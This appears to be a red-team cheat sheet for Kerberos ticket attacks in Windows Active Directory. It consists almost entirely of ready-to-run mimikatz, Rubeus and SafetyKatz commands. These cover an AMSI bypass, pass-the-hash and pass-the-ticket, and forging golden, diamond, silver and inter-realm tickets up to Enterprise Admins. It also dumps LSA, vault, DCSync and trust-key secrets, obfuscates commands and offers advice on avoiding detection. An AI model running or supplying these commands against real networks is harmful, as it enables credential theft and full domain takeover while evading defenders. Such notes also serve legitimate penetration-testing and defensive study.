
credentials / krb

MITRE ATT&CK Enterprise: T1558 Steal or Forge Kerberos Tickets


tools


runas

# Start a cmd.exe whose NETWORK authentication uses the supplied account
# (/netonly); the local identity stays the current user. NOTE: with /netonly
# the password is typically not validated at launch, so a typo only shows up
# when the first remote access fails.
runas /user:XXX\XXX /netonly cmd
# Enter the password for XXX\XXX:

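# Start PowerShell through InviShell (per the script name: registry-based, non-admin
# variant) and apply the AMSI bypass read from a local file.
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
iex (get-content .\amsibypass.txt)

# Check the language mode before doing anything else: the rest of this page
# expects FullLanguage (anything else, e.g. ConstrainedLanguage, will likely
# break the tooling below). The expected answer is kept as a comment so the
# pasted output is not mistaken for a command.
$ExecutionContext.SessionState.LanguageMode
# -> FullLanguage

$ErrorActionPreference = 'SilentlyContinue' # hide errors on our console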

pass-the-ticket

pth

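# load powershell with PTH (over-pass-the-hash): spawn a PowerShell whose logon
# session authenticates on the network with the target's Kerberos key; local
# identity is unchanged. Needs local admin for privilege::debug.
mimikatz.exe
privilege::debug
# /rc4: takes the NT hash (same variable as the Rubeus examples below).
# Prefer /aes256: with the AES key when you have it — RC4-only ticket requests
# from a modern client are a frequently used detection signal.
sekurlsa::pth /user:$ztarg_user_name /rc4:$ztarg_user_nthash /domain:$zdom /dc:$zdom_dc_fqdn /run:"powershell -ep bypass"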

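# load cmd with PTH: ask a TGT with the target's AES256 key and inject it into a
# new hidden netonly cmd.exe (/createnetonly); /opsec asks Rubeus to mimic a
# genuine Windows client request. When Rubeus is run directly, the first
# argument is the Rubeus command — "-args" belongs to the loader form below.
.\Rubeus.exe asktgt /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# Same through the loader held in $zloader. PowerShell needs the call operator
# '&' to invoke a command stored in a variable; without it the line is a syntax error.
& ${zloader} -Path .\Rubeus.exe -args asktgt /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# load cmd with PTH / go to command-obfuscation for the %Pwn% variable.
# cmd.exe syntax: run from the cmd session that executed that batch file, and make
# sure %Pwn% expands to a Rubeus command (e.g. asktgt) — as written, the batch in
# command-obfuscation builds a mimikatz command for SafetyKatz, not a Rubeus one.
# Key variable aligned with the rest of the page ($ztarg_user_aes256k).
Rubeus.exe %Pwn% /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt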

ptt

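# ptt via a DInvoke-based loader (same command as above, delivered through zloader.exe)
C:\Users\Public\zloader.exe -path .\Rubeus.exe -args asktgt /user:$ztarg_user_name /aes256:$ztarg_user_aes256k /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# Request a TGT as the target user and pass it into the current session.
# Clear the current session's tickets first so two TGTs are not active at once
# (this also drops the legitimate tickets of the account you are running as).
# /rc4: takes the NT hash; use /aes256: with the AES key when available.
klist purge
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_nthash /ptt

# Pass the ticket to a sacrificial hidden process instead, so the current session
# keeps its own tickets; e.g. to later steal the token from that process (requires elevation)
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_nthash /createnetonly:C:\Windows\System32\cmd.exe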

command-obfuscation

REM script file to obfuscate the token manipulation commands
REM The mimikatz command name is assembled from fragments at run time, so the
REM literal string never appears in this file; only the final %Pwn% expansion
REM is passed to SafetyKatz. Note that "echo %Pwn%" still prints it to the console.
@echo off
set "f1=sek"
set "f2=url"
set "f3=sa"
set "f4=::"
set "f5=ek"
set "f6=eys"
set "Pwn=%f1%%f2%%f3%%f4%%f5%%f6%"
echo %Pwn%
C:\Users\Public\SafetyKatz.exe %Pwn% exit

forge

tgt

# inter-realm TGT / ZDOM TO ZFOREST
# Golden ticket for zdom (signed with its krbtgt AES key) carrying an extra SID in
# /sids: so that it is honoured by the forest root; as in the silver-ea section
# the extra SID is meant to be Enterprise Admins. NOTE(review): the silver-ea
# section appends "-519" to ${zea_sid} — confirm whether ${zea_sid} here already
# holds the full EA SID or only the forest-root domain SID.
.\Loader.exe -path .\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:${zdom_fqdn} /sid:${zdom_sid} /sids:${zea_sid} /aes256:${zdom_krbtgt_aes256k} /netbios:${znbss} /ptt

# TO TEST — not validated yet; kept for reference
#cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_dc_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
#cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_computer_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
#
#./Rubeus.exe asktgt /user:$ztarg_user_name /password:$ztarg_user_pass /domain:$zdom /dc:$zdom_dc_fqdn /ptt
#Invoke-Mimi -Command '"sekurlsa::ekeys"'

diamond

  • Modifies a TGT that the DC genuinely issued (a real AS-REQ/AS-REP took place), which sidesteps the "forged TGT with no pre-authentication" detection that catches golden tickets
  • requires the KRBTGT account key (AES key or NT hash)
  • expected output: `[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9`
#$zdom_krbtgt_aes256k=""
# Diamond ticket: /tgtdeleg obtains a real TGT for the current logon (no password
# or key of that user needed), /krbkey decrypts it with the krbtgt AES key, the PAC
# is rewritten as /ticketuser (RID 500, /groups:512 = Domain Admins) and the ticket
# is re-encrypted with the same key. It is then injected into a hidden netonly
# cmd.exe — expect "LOGON_TYPE = 9" from /createnetonly.
C:\Users\Public\Loader.exe -path .\Rubeus.exe -args diamond /krbkey:${zdom_krbtgt_aes256k} /tgtdeleg /enctype:aes /ticketuser:administrator /domain:${zdom_fqdn} /dc:${zdom_dc_fqdn} /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

golden

  • Forges a TGT entirely offline: no pre-authentication and no AS-REQ/AS-REP exchange with the DC ever happens, so the DC sees a TGT it never issued (the signal the diamond ticket above is designed to avoid)
  • requires the KRBTGT account key (AES key or NT hash)
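#$zdom_krbtgt_aes256k=""
#$zdom_krbtgt_norid=""   # domain SID, i.e. the krbtgt object SID without its RID
# 01 # CMD TO RUN: /ldap pulls the real attributes of /user from the directory and
# /printcmd prints a fully populated evasive-golden command instead of forging.
C:\Users\Public\Loader.exe -path .\Rubeus.exe -args evasive-golden /aes256:${zdom_krbtgt_aes256k} /sid:${zdom_krbtgt_norid} /ldap /user:Administrator /printcmd
# 02 # BUILT CMD TO COPY/PASTE. The pwdlastset / logoncount / groups values below
# were captured from one lab and are only examples: re-run step 01 against the
# target and use ITS output, otherwise the PAC contradicts the real account.
# /netbios: uses the same variable as the inter-realm example above.
C:\Users\Public\Loader.exe -path .\Rubeus.exe -args evasive-golden /aes256:${zdom_krbtgt_aes256k} /user:Administrator /id:500 /pgid:513 /domain:${zdom_fqdn} /sid:${zdom_krbtgt_norid} /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:152 /netbios:${znbss} /groups:544,512,520,513 /dc:${zdom_dc_fqdn} /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt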

silver

  • the key of the account running the service is required to forge a TGS
  • usually that is the machine account key; machine account passwords rotate every 30 days by default, after which the forged ticket stops working
  • quieter than a golden ticket: the ticket goes straight to the service, so the DC sees neither an AS-REQ nor a TGS-REQ
  • the service class in the SPN can be swapped for any class hosted by the same account (not restricted to msDS-AllowedToDelegateTo)
# SILVER TICKET AS Domain Admin (DA)
#$zdom_krbtgt_aes256k=""
#$zdom_krbtgt_norid=""
# NOTE(review): a silver ticket for http/<DC> must be encrypted with the key of the
# account hosting that service — the DC machine account (DC$) — not with the krbtgt
# key, as the bullets above say. The krbtgt key is only the right one when the
# service is krbtgt/<realm> (the silver-ea and referral sections). Re-check the key
# variable before using this as-is; /ldap fills the PAC fields from the directory.
C:\Users\Public\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/${zdom_dc_fqdn} /aes256:${zdom_krbtgt_aes256k} /sid:${zdom_krbtgt_norid} /ldap /user:Administrator /domain:${zdom_fqdn} /ptt

silver-ea

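# 01 # forge a TGT carrying the Enterprise Admins SID (${zea_sid}-519 in /sids:).
# The service is krbtgt/<realm>, so this is effectively a golden ticket for that
# realm; the key given must be the krbtgt key of the SAME realm named in /service:.
# NOTE(review): confirm ${zdom_fqdn} is the realm ${zforest_krbtgt_nthash} belongs to.
# /nowrap prints the base64 ticket on one line for copy/paste into step 02.
# (The pasted "C:\AD\Tools>" prompt was removed — in PowerShell it is parsed as a redirection.)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/${zdom_fqdn} /rc4:${zforest_krbtgt_nthash} /sid:${zdom_sid} /sids:${zea_sid}-519 /ldap /user:Administrator /nowrap

# 02 # import the ticket: use the forged TGT to request an HTTP service ticket for
# the forest-root DC and inject it (/ticket: is the base64 blob from step 01).
.\Loader.exe -path .\Rubeus.exe -args asktgs /service:http/${zforest_dc_fqdn} /dc:${zforest_dc_fqdn} /ptt /ticket:doIFX...==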
Service Type                | Service(s) to forge for a silver ticket
WMI                         | HOST, RPCSS
PowerShell Remoting         | HOST, HTTP (WSMAN, RPCSS depending on the OS)
WinRM                       | HOST, HTTP
Scheduled Tasks             | HOST
Windows File Share (CIFS)   | CIFS
LDAP operations (DCSync)    | LDAP
Windows RSAT                | RPCSS, LDAP, CIFS

referral

# 01 # forge an inter-realm referral TGT: service krbtgt/<realm being entered>,
# encrypted with the trust key (${zdom_trustk}, see lsadump-trust below) instead of
# a krbtgt key. NOTE(review): the trust key must be the one for this trust direction
# and the realm in /service: must be the one whose DC is queried in step 02.
#$zdom_sid
#$zdom_trustk
.\Loader.exe -path .\Loader.exe -args evasive-silver /service:krbtgt/${zdom_fqdn} /rc4:${zdom_trustk} /sid:${zdom_sid} /ldap /user:Administrator /nowrap

# 02 # import the ticket: present the referral TGT to the target DC to obtain a
# CIFS service ticket for it, then inject it (/ticket: is the blob from step 01).
.\Loader.exe -path .\Rubeus.exe -args asktgs /service:cifs/${zdom_dc_fqdn} /dc:${zdom_dc_fqdn} /ptt /ticket:doIFX...==

dump

vault

# Windows Vault: contains secrets for scheduled tasks, saved credentials, ...
# token::elevate impersonates SYSTEM first (needs local admin); /patch avoids
# the protected-storage API and reads the data directly.
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

lsadump-lsa

# dump credentials held by LSA on this host (local accounts; domain accounts too on a
# DC) — lsadump::lsa /patch reads them via the LSA service, the second command pulls
# the Kerberos keys cached in LSASS memory. Both need local admin (token::elevate).
Invoke-Mimi -Command '"token::elevate" "lsadump::lsa /patch"'
Invoke-Mimi -Command '"token::elevate" "sekurlsa::evasive-keys /patch"'

lsadump-dcsync

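# dcsync: replicate one account's secrets from a DC over the network (needs replication
# rights: DA-equivalent or explicit DS-Replication-Get-Changes*); no LSASS access on
# the local host is involved.
#$znbss=""
#$ztarg_user_name="krbtgt"
#$zx=$znbss+"\"+$ztarg_user_name
.\Loader.exe -path .\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:${zx}" "exit"
# mimikatz dcsync requires a /user: (or /all) target; the original line had none and
# errors out. Single quotes do not expand variables, so the target is concatenated in.
# NOTE(review): token::elevate impersonates SYSTEM, i.e. the local machine account —
# on anything but a DC that account normally has no replication rights, so if this
# fails run it as the user holding the rights without the elevate step.
Invoke-Mimi -Command ('"token::elevate" "lsadump::dcsync /user:' + $zx + '"')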

lsadump-trust

# dump the inter-realm TRUST keys (not the krbtgt key: that is what dcsync above is
# for). These are the keys the referral section uses as ${zdom_trustk}. Here the
# loader fetches SafetyKatz from a local HTTP listener instead of disk.
.\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

manipulate

cleartext-2-nthash

# compute the NT hash (and Kerberos keys) from a clear-text password; the realm/user
# given with -u is needed because the AES keys are salted with them
cerbero hash $ztarg_user_pass -u $zdom_fqdn/$ztarg_user_name
# paste the values from the output above into the variables used across this page
$ztarg_user_nthash=""
$ztarg_user_aes256k=""

ccache-convert

# Convert a Linux ccache ticket to the Windows kirbi format (either tool works;
# ticketConverter.py comes with impacket). The reverse direction is the same
# commands with the file names swapped.
ticketConverter.py $ztarg_user_name".ccache" $ztarg_user_name".krb"
cerbero convert -i $ztarg_user_name".ccache" -o $ztarg_user_name".krb"

krb-export

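# export the Kerberos tickets of the current session to .kirbi files in the cwd
# (they are written next to mimikatz — clean them up afterwards)
cd C:\tools\mimikatz\x64
# privilege::debug takes two colons; "privilege:debug" is not a valid mimikatz command
mimikatz.exe privilege::debug
kerberos::list /export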

which-os-what-creds

Windows Credentials by Auth. Service & by OS